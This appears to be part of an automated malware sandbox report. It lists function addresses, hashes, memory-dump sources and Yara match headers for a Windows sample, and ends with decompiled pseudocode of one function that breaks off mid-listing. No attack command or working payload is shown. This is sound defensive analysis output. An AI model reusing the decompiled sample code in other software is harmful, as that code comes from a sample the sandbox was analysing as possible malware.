Opcode ID: 22c97c5aac6228da4a73c4fda9db3ecabe46f31857febbbda342830820b89ca4
Instruction ID: 50b9d171b9e00b39eed2519360415860779ea5f8b63665066c0a9c1c628266a1
Opcode Fuzzy Hash: 22c97c5aac6228da4a73c4fda9db3ecabe46f31857febbbda342830820b89ca4
Instruction Fuzzy Hash: CE518E66B197000B875E88BE54D496794C39FEF25036AE63E612DF33A9EDB9CC0F1148

Uniqueness

Uniqueness Score: -1.00%

Function 00402621, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 262memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00011000,-2D564770,-01FB8249), ref: 00402703

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: "i(
API String ID: 4275171209-1157772168
Opcode ID: 26a0faed6fcc43420c26ecaa29140aff26abdacfef5ddb0b19d94e81cf2d8352
Instruction ID: 64cdbc78d2a3e61f876531752b495dfecb6ba868b147987379eb7d1bb67067b6
Opcode Fuzzy Hash: 26a0faed6fcc43420c26ecaa29140aff26abdacfef5ddb0b19d94e81cf2d8352
Instruction Fuzzy Hash: B8419B66B197000B8B5E88BE54D4967D4C39FEE210379E63E612DF33A9EDB9CC0B1148

Uniqueness

Uniqueness Score: -1.00%

Function 004026B3, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00011000,-2D564770,-01FB8249), ref: 00402703

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: "i(
API String ID: 4275171209-1157772168
Opcode ID: 15da5cfe9853f829d1667f7d6148f866f1466f8accf288e3cd304a303b72715d
Instruction ID: 2ce8d48c00e0c4691f661b96a943917fdd4ec56c233d910b6b05b122e37a62d1
Opcode Fuzzy Hash: 15da5cfe9853f829d1667f7d6148f866f1466f8accf288e3cd304a303b72715d
Instruction Fuzzy Hash: 6C41E522B093000B875EC8BE54D0956A5C39FEE210379E63D612DF73A5EEB9CC0B124C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 020CB009, Relevance: 6.5, Strings: 4, Instructions: 1516COMMON

Download Yara Rule

Strings

&=)/, xrefs: 020CB5A8
Rmet, xrefs: 020CB611
lq-q, xrefs: 020C64B6
A', xrefs: 020CB5DE

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: A'$&=)/$Rmet$lq-q
API String ID: 0-580957142
Opcode ID: ece5b1a994eaaa1a9219d3414e4ffc5b525d56ad9f10f811f55f6b4ca4736658
Instruction ID: da3435f345feeddbb9e9623ddb55991e4f96cf1266c2c6ec4b226b74a571e17a
Opcode Fuzzy Hash: ece5b1a994eaaa1a9219d3414e4ffc5b525d56ad9f10f811f55f6b4ca4736658
Instruction Fuzzy Hash: AAD254B160438A8FDF759F38CD957DE7BA2AF56350F55822ECC898B255D3308A85CB02

Uniqueness

Uniqueness Score: -1.00%

Function 020CAEF3, Relevance: 2.6, Strings: 2, Instructions: 79COMMON

Download Yara Rule

Strings

:}s, xrefs: 020CAF7C
+k, xrefs: 020CAF55

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: +k$:}s
API String ID: 0-4190391470
Opcode ID: a4ec7f85870a545324ffb2cdc1ebf4c6093d45b0655d1fd203564ca94542e6c7
Instruction ID: 47c7356f8d6aea33114f8ee2569531c704faf38217f78e23c88598c33356a7dc
Opcode Fuzzy Hash: a4ec7f85870a545324ffb2cdc1ebf4c6093d45b0655d1fd203564ca94542e6c7
Instruction Fuzzy Hash: E421C4B574834B8FCB20DF68C8E47DE63A1EF5A780F99412DDD8D8B202E7744945D641

Uniqueness

Uniqueness Score: -1.00%

Function 020C639E, Relevance: 2.0, Strings: 1, Instructions: 768COMMON

Download Yara Rule

Strings

lq-q, xrefs: 020C64B6

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: lq-q
API String ID: 0-45059717
Opcode ID: c964b535f586e3e96a072646d8a8a2fc7e83de67319257fed03639949206125a
Instruction ID: b33c6ed8a80ee3897d477711ee21fa5c92cf494a206217fb392cf2e909a426c3
Opcode Fuzzy Hash: c964b535f586e3e96a072646d8a8a2fc7e83de67319257fed03639949206125a
Instruction Fuzzy Hash: 5E5241B56003499FDB718F34CD953EA7BA2BF59350F65812ECC8A9B614D3318A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020C8598, Relevance: 1.7, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

Bja, xrefs: 020C899D

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Bja
API String ID: 0-2554377269
Opcode ID: e441e6f6c78b5bcf86205e0ad8b4ad5b63c9ba5b32f25720a43df9d56455e1d4
Instruction ID: 104f38819ff4f13e3406703ba97f0ec817ba12ff43e4515d889684725db62c3d
Opcode Fuzzy Hash: e441e6f6c78b5bcf86205e0ad8b4ad5b63c9ba5b32f25720a43df9d56455e1d4
Instruction Fuzzy Hash: 520212B060038ADFCF359F38C9507EE37A2AF55350F60852EDD8A9B650D7318A45DB11

Uniqueness

Uniqueness Score: -1.00%

Function 020C8698, Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

Bja, xrefs: 020C899D

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Bja
API String ID: 0-2554377269
Opcode ID: 0e9bbe4e85896be8b9596b52c221364367334ab0dab096e14021dc72181caa4f
Instruction ID: 53610d3562def7969063faaaa6738d81ce8c0935b452f898b99a118ba80ef1fd
Opcode Fuzzy Hash: 0e9bbe4e85896be8b9596b52c221364367334ab0dab096e14021dc72181caa4f
Instruction Fuzzy Hash: E0B15975244349CBDF354F319D913EE7BA2AF46260F64893ECDCA9B944E3324649D702

Uniqueness

Uniqueness Score: -1.00%

Function 020C85E0, Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

Bja, xrefs: 020C899D

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Bja
API String ID: 0-2554377269
Opcode ID: ad9d80d93f19338fd9690abdec2f76aaf012dc17fae60e6fb9cf50758b24a2d1
Instruction ID: 97fe32571d5c69eb1deeb5fb42a8c30547a2c9cc43e586c5db0e94c6ee848488
Opcode Fuzzy Hash: ad9d80d93f19338fd9690abdec2f76aaf012dc17fae60e6fb9cf50758b24a2d1
Instruction Fuzzy Hash: C4A127B020038A9FCB359F39CDA07EF37A2AF45340F50852EDD999B654E7318A85DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020C8BBD, Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

Bja, xrefs: 020C899D

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Bja
API String ID: 0-2554377269
Opcode ID: 95132fb508e78008a47fdbd0ff4767523ded0bbe0f39128a6ba88ab835ad58fa
Instruction ID: 957fe2f4855faed0a0558ca9fce6b6a5bfbb73016f6697443e586284ccb79995
Opcode Fuzzy Hash: 95132fb508e78008a47fdbd0ff4767523ded0bbe0f39128a6ba88ab835ad58fa
Instruction Fuzzy Hash: 6AA101B020038ADFCF759E34CDA17EF33A2AF55350F90852E9D9A9B650E7318685DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020CA450, Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

HC#, xrefs: 020CA479

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: HC#
API String ID: 0-1542857050
Opcode ID: 388ef90dbe27e191fbc092056968967f862f8f2ac9f1d404ffeb42402b19ec85
Instruction ID: 6a4f593456f83567ec13c2789df0d78ff7d95a6008f21c7bd12be960ec34f7c2
Opcode Fuzzy Hash: 388ef90dbe27e191fbc092056968967f862f8f2ac9f1d404ffeb42402b19ec85
Instruction Fuzzy Hash: F2418CB4A0438ADFCF71DF288A987DD37A1AF593A0FA0812ADC49DB601D3308A41DB51

Uniqueness

Uniqueness Score: -1.00%

Function 020C7AFA, Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

`, xrefs: 020C7C84

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 455a5a9abb446b1ff017a76401220838261766324dde3b61ac6f1c28ff77d2a6
Instruction ID: 09f901a06073bc5b81b4ad1db170bab93d4ff903a010deb143117b251aedb87f
Opcode Fuzzy Hash: 455a5a9abb446b1ff017a76401220838261766324dde3b61ac6f1c28ff77d2a6
Instruction Fuzzy Hash: 1741E1707447894BEF388E38CDA57EE36B3AF92360F90421EDC5B8A294DB344645DA01

Uniqueness

Uniqueness Score: -1.00%

Function 020C67BE, Relevance: .6, Instructions: 556COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc689d32057391d1f83fa60d5ac045d74978543114107c14b45bd36313f38c31
Instruction ID: 2e8037e99694f020981f7a824aa1f3c6039196a1a4e2f86bb5fd7bd8d77fa973
Opcode Fuzzy Hash: fc689d32057391d1f83fa60d5ac045d74978543114107c14b45bd36313f38c31
Instruction Fuzzy Hash: 622220766003889FDF719F34DD923EE7BA2AF59350F55842EDD8A9B614D3314A88CB02

Uniqueness

Uniqueness Score: -1.00%

Function 020C6651, Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f274f6d6a77e65ccaf6ee921acf807bbbbb978882664d7b0e63b6816bc4b6e
Instruction ID: 1ab05048725ee99f02baad68341e261e1fbdc1240db8c364688db44f3681ca74
Opcode Fuzzy Hash: 73f274f6d6a77e65ccaf6ee921acf807bbbbb978882664d7b0e63b6816bc4b6e
Instruction Fuzzy Hash: 5332EBB16003899FDB759F38C9957DABBB2FF59340F55812EDC8A9B214D3308A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020CA5DF, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 795b0f1f5550e4ef27fc4b06d412e096a730ec1f8b3f403cc1aac3256c3ea10a
Instruction ID: 2c5bc54a444d1e3d0eee018e1d0fc6a5c1f2508f5cf90a2bdcf0e8cfa8ba1756
Opcode Fuzzy Hash: 795b0f1f5550e4ef27fc4b06d412e096a730ec1f8b3f403cc1aac3256c3ea10a
Instruction Fuzzy Hash: A0D124B1A0034A9FDF759F28CD997EE37E2AF55390F65412EDC899B240E3305A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 020C6BFC, Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a275c8c485bf1c032db1cce74e2200b667fa9abe6e49683c64836f1c5e4d2e
Instruction ID: 0bb6e965a871723929de9642bc564d75fa2d91354c1c7633f17eefb7d0688015
Opcode Fuzzy Hash: f8a275c8c485bf1c032db1cce74e2200b667fa9abe6e49683c64836f1c5e4d2e
Instruction Fuzzy Hash: 29D1F17A2403888BDF758F74DD923EE7BA2BF59350F64452EDD8A8B650D7324688CB01

Uniqueness

Uniqueness Score: -1.00%

Function 020C6ABF, Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a709f7f0678663e69d28698ab7f571015b35a49c2cc086ba3c4ed10719838b25
Instruction ID: fb0219b6ff67a4c2d5ac8b2f4aae7a8c62a62438c02c438d702d063f84e0eb67
Opcode Fuzzy Hash: a709f7f0678663e69d28698ab7f571015b35a49c2cc086ba3c4ed10719838b25
Instruction Fuzzy Hash: DDD1C9B56003899FDFB59F28C9A17EE7BA2BF19344F51402ADD8A9B220D7314A858B41

Uniqueness

Uniqueness Score: -1.00%

Function 020CA6A7, Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73cde6fe4ceb676de52792b1c5b573381d492eabae0303e6aafb4074c46005a4
Instruction ID: c6a1dc49ab823105e7f73d7ce8e0e17dfc2bf5a58b60b0a26ee1a65d26ee1a38
Opcode Fuzzy Hash: 73cde6fe4ceb676de52792b1c5b573381d492eabae0303e6aafb4074c46005a4
Instruction Fuzzy Hash: 157128362443488BDB358F75AD863EE7FE1AF49660F65893ECC8697A84E3320249C741

Uniqueness

Uniqueness Score: -1.00%

Function 020C4D15, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f476392061793b545e4b022a35ded3910322de57f72485707757f7cfc94025b2
Instruction ID: 5847c2964119a8b32257ae68f8094f2fc480d8296d9c2c340cdd8dd5a5b80de0
Opcode Fuzzy Hash: f476392061793b545e4b022a35ded3910322de57f72485707757f7cfc94025b2
Instruction Fuzzy Hash: 4E5159B1A043898FCF359F28C8547DE37A1AF5A364F55866EDC8D8B682D7314905CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020C6E70, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e50c8b09dcc05fe3b78bca6360a2c4675637a6f5a8aa54a5f3295f457c62a618
Instruction ID: b46fa7d940d6ccc23027bba281350efee92690747201258942ea6a373617fc59
Opcode Fuzzy Hash: e50c8b09dcc05fe3b78bca6360a2c4675637a6f5a8aa54a5f3295f457c62a618
Instruction Fuzzy Hash: AD61BBB5200389DFDF769F78CD957DE7BA2BF19344F104129ED8A9A220D7318A85DB40

Uniqueness

Uniqueness Score: -1.00%

Function 020CA3AD, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 663b5c3ca97b12b81ea929df4284fbf47fde76ca9a169a81d1f3cafbe21cf22d
Instruction ID: 3a84c57986ec5d8e47b9a86270c45aaab64f0f64401031484920c6774dae01ef
Opcode Fuzzy Hash: 663b5c3ca97b12b81ea929df4284fbf47fde76ca9a169a81d1f3cafbe21cf22d
Instruction Fuzzy Hash: A751F5B060034EDBCF35AF3888A87EE77A2EF5A7A0FA0802EDC49D7501D33189459B41

Uniqueness

Uniqueness Score: -1.00%

Function 020C5E21, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a42f8c9463d5bbf7d93d00d03b5ed4a6387b4bdf4ba53fa60ae686a66566bd0
Instruction ID: 4ae1e522b7f6f04f2b7e8a66ace7b97d05fbba70a4523b54e3e9b8fb78aeff72
Opcode Fuzzy Hash: 7a42f8c9463d5bbf7d93d00d03b5ed4a6387b4bdf4ba53fa60ae686a66566bd0
Instruction Fuzzy Hash: 655101B460034A9FDBB08F2889E17DF32F6AF49785F94062ECD8D9B601C33669818B15

Uniqueness

Uniqueness Score: -1.00%

Function 020C9D8F, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47104dbc5a46573d6632fcab5d9d961fde430e18aaf969e82c3e9bf326a92299
Instruction ID: ccb0bff6d3dd8f41d2013ad617eaccbcec7eab3dec47098f6d18a4661bafde32
Opcode Fuzzy Hash: 47104dbc5a46573d6632fcab5d9d961fde430e18aaf969e82c3e9bf326a92299
Instruction Fuzzy Hash: 5151C7B060038D9FCF319F7888957EA77B2AF6A390FA5852ADC8CCB205D33189419B51

Uniqueness

Uniqueness Score: -1.00%

Function 020C796A, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde936511bb8949b8efb5e3a0f6d3f9eefcf8269f96e43d49e2bae096e785e42
Instruction ID: 570f2cb4c412db1876268c4d825f68b1e7c26acc6b3bb7e18111f169656b7f5f
Opcode Fuzzy Hash: fde936511bb8949b8efb5e3a0f6d3f9eefcf8269f96e43d49e2bae096e785e42
Instruction Fuzzy Hash: 5741E4B160034A9FCF759F389D683EE37A2AF5A3A0FA5412EDC8DDB500D33146469B51

Uniqueness

Uniqueness Score: -1.00%

Function 020CAC45, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17ee88f8ead5303c5ed4e91bc22f00a79adb67ec81e336fae239a38168c4988
Instruction ID: b7386835c6e29360f267cd684df088a0eb71c87e693d8e100a02c6cc60225ff3
Opcode Fuzzy Hash: e17ee88f8ead5303c5ed4e91bc22f00a79adb67ec81e336fae239a38168c4988
Instruction Fuzzy Hash: F131AB71A083558FD7219E3988583EFBBE3AF99750F55855CCC469B259C33189828B80

Uniqueness

Uniqueness Score: -1.00%

Function 020C5C13, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35ddf81e2e9952ef7017d8e7d4072b6b9c0950c2eec5e392f6b8ee997f6fc778
Instruction ID: bf81433acaedf5bf5bd3062ae794bbbdd839b9f7bc827559b8293e151332a4d0
Opcode Fuzzy Hash: 35ddf81e2e9952ef7017d8e7d4072b6b9c0950c2eec5e392f6b8ee997f6fc778
Instruction Fuzzy Hash: 063116B15083818BDF719FB8CCD8B8DBB92AF46214F98829ECD985A1DBD3361442C712

Uniqueness

Uniqueness Score: -1.00%

Function 020C5C74, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d763dc55779f70aa5153c3a6a1ed6b1c28577cbee4e606bc34c3e3e50c8a5e
Instruction ID: 96072ba485cf556ab245d78b83d9890cd525fdb18c59213c4a506fcb4d7ac6f4
Opcode Fuzzy Hash: e7d763dc55779f70aa5153c3a6a1ed6b1c28577cbee4e606bc34c3e3e50c8a5e
Instruction Fuzzy Hash: C13126B15083C18BDF359FB8CC98B8ABF929F46314F99829ECC985A1DBD3350482D716

Uniqueness

Uniqueness Score: -1.00%

Function 020C5C54, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fcedff5c1ad88e79dbb2058c1b7f5ebfbd31a23730d6481e5c08b27168798b2
Instruction ID: 3365102e559982ddc66a0ce2e88923b0b5d84116fa34f124f038c213f8b13872
Opcode Fuzzy Hash: 7fcedff5c1ad88e79dbb2058c1b7f5ebfbd31a23730d6481e5c08b27168798b2
Instruction Fuzzy Hash: F931F6716087818BDF75CFB8C894B8ABB92AF46310F98829ECC585A1DBE3355442C752

Uniqueness

Uniqueness Score: -1.00%

Function 020CABE2, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb6fd3c98ddfdccb5c1ffd94299d853ab248e956bfe207795f7f986fb961a36
Instruction ID: cd9772a8808114b8c1c0a57636ebec3320887603dd447c8cb71abe2598bf7836
Opcode Fuzzy Hash: bdb6fd3c98ddfdccb5c1ffd94299d853ab248e956bfe207795f7f986fb961a36
Instruction Fuzzy Hash: 0B218B76A043658FE7305E788DA97DF77E6AFD4360F86812DDC46DB258C73189868600

Uniqueness

Uniqueness Score: -1.00%

Function 020C7A45, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b903e1e8b0d04ab4a643be816973ac9b500bd16143ed3307d5a887574d2431
Instruction ID: 1a5db691966d0220f753e4179dabbf20cef225140b5571c82da5d2b52da2f41b
Opcode Fuzzy Hash: 59b903e1e8b0d04ab4a643be816973ac9b500bd16143ed3307d5a887574d2431
Instruction Fuzzy Hash: BEC08CD36082270A07AA29342F4149F48CB5AC52947208A68E005D2828E880CF802849

Uniqueness

Uniqueness Score: -1.00%

Function 020C78C4, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0725264b3bb59aac2996f42af322c631a70487f772e2a29adfe2bf71c9c3c60d
Instruction ID: 8adbdd0a2d1399384bdb001d705cabb12aba1d2d47d8ae68ce4732659152b54d
Opcode Fuzzy Hash: 0725264b3bb59aac2996f42af322c631a70487f772e2a29adfe2bf71c9c3c60d
Instruction Fuzzy Hash: E6C048BA6005818FFF12DB19D4A1B8173A4EB15B98B8A04E0E456DBA21D328E904CB00

Uniqueness

Uniqueness Score: -1.00%

Function 020C9EE3, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e00db63157469919ab4bf40680519dd562df6fc69d6d199fc83800db41edbc
Instruction ID: 534e5b10389f98175bd87cac5619c79083956c58f02dea6683a07ac69de92a93
Opcode Fuzzy Hash: a2e00db63157469919ab4bf40680519dd562df6fc69d6d199fc83800db41edbc
Instruction Fuzzy Hash: DEB092703116408FC341CE08C1D0F4073B0FB04B90B5148A4E401C7A11C324E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 00413DE4, Relevance: 82.6, APIs: 44, Strings: 3, Instructions: 345
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00413DE4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v52;
				signed int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void* _v84;
				char _v88;
				char _v92;
				signed int _v100;
				signed int _v108;
				char _v128;
				char _v132;
				char _v136;
				void* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t92;
				void* _t96;
				intOrPtr* _t97;
				void* _t98;
				void* _t100;
				intOrPtr* _t101;
				void* _t102;
				void* _t104;
				intOrPtr* _t105;
				signed int _t106;
				void* _t119;
				intOrPtr* _t120;
				void* _t121;
				char* _t123;
				void* _t127;
				char* _t128;
				void* _t168;
				intOrPtr* _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				intOrPtr* _t177;
				intOrPtr* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				intOrPtr* _t183;
				intOrPtr* _t184;
				intOrPtr _t188;
				intOrPtr _t194;

				_push(0x401176);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t188;
				_v12 = _t188 - 0xac;
				_v8 = E004010F8;
				_t194 =  *0x416e8c; // 0x2aae8cc
				_v36 = 0;
				_v52 = 0;
				_v56 = 0;
				_v60 = 0;
				_v64 = 0;
				_v68 = 0;
				_v72 = 0;
				_v76 = 0;
				_v80 = 0;
				_v84 = 0;
				_v88 = 0;
				_v92 = 0;
				_v108 = 0;
				_v128 = 0;
				_v132 = 0;
				_v136 = 0;
				if(_t194 == 0) {
					_push(0x416e8c);
					_push(0x412434);
					L004012A8();
				}
				_t172 =  *0x416e8c; // 0x2aae8cc
				_t89 =  *((intOrPtr*)( *_t172 + 0x14))(_t172,  &_v84);
				asm("fclex");
				if(_t89 >= 0) {
					_t168 = 0x412424;
				} else {
					_t168 = 0x412424;
					_push(0x14);
					_push(0x412424);
					_push(_t172);
					_push(_t89);
					L004012A2();
				}
				_t90 = _v84;
				_t173 = _t90;
				_t91 =  *((intOrPtr*)( *_t90 + 0x60))(_t90,  &_v56);
				asm("fclex");
				if(_t91 < 0) {
					_push(0x60);
					_push(0x412444);
					_push(_t173);
					_push(_t91);
					L004012A2();
				}
				_t174 = _a4;
				L004012AE();
				L004012B4();
				_t92 =  *((intOrPtr*)( *_t174 + 0x54))(_t174, _t91, _v56, L"About ");
				asm("fclex");
				if(_t92 < 0) {
					_push(0x54);
					_push(0x41218c);
					_push(_t174);
					_push(_t92);
					L004012A2();
				}
				_push( &_v60);
				_push( &_v56);
				_push(2);
				L0040129C();
				L00401296();
				if( *0x416e8c == 0) {
					_push(0x416e8c);
					_push(0x412434);
					L004012A8();
				}
				_t175 =  *0x416e8c; // 0x2aae8cc
				_t96 =  *((intOrPtr*)( *_t175 + 0x14))(_t175,  &_v84);
				asm("fclex");
				if(_t96 < 0) {
					_push(0x14);
					_push(_t168);
					_push(_t175);
					_push(_t96);
					L004012A2();
				}
				_t97 = _v84;
				_t176 = _t97;
				_t98 =  *((intOrPtr*)( *_t97 + 0xb8))(_t97,  &_v128);
				asm("fclex");
				if(_t98 >= 0) {
					_t127 = 0x412444;
				} else {
					_t127 = 0x412444;
					_push(0xb8);
					_push(0x412444);
					_push(_t176);
					_push(_t98);
					L004012A2();
				}
				if( *0x416e8c == 0) {
					_push(0x416e8c);
					_push(0x412434);
					L004012A8();
				}
				_t177 =  *0x416e8c; // 0x2aae8cc
				_t100 =  *((intOrPtr*)( *_t177 + 0x14))(_t177,  &_v88);
				asm("fclex");
				if(_t100 < 0) {
					_push(0x14);
					_push(_t168);
					_push(_t177);
					_push(_t100);
					L004012A2();
				}
				_t101 = _v88;
				_t178 = _t101;
				_t102 =  *((intOrPtr*)( *_t101 + 0xc0))(_t101,  &_v132);
				asm("fclex");
				if(_t102 < 0) {
					_push(0xc0);
					_push(_t127);
					_push(_t178);
					_push(_t102);
					L004012A2();
				}
				if( *0x416e8c == 0) {
					_push(0x416e8c);
					_push(0x412434);
					L004012A8();
				}
				_t179 =  *0x416e8c; // 0x2aae8cc
				_t104 =  *((intOrPtr*)( *_t179 + 0x14))(_t179,  &_v92);
				asm("fclex");
				if(_t104 < 0) {
					_push(0x14);
					_push(_t168);
					_push(_t179);
					_push(_t104);
					L004012A2();
				}
				_t105 = _v92;
				_t180 = _t105;
				_t106 =  *((intOrPtr*)( *_t105 + 0xc8))(_t105,  &_v136);
				asm("fclex");
				if(_t106 < 0) {
					_push(0xc8);
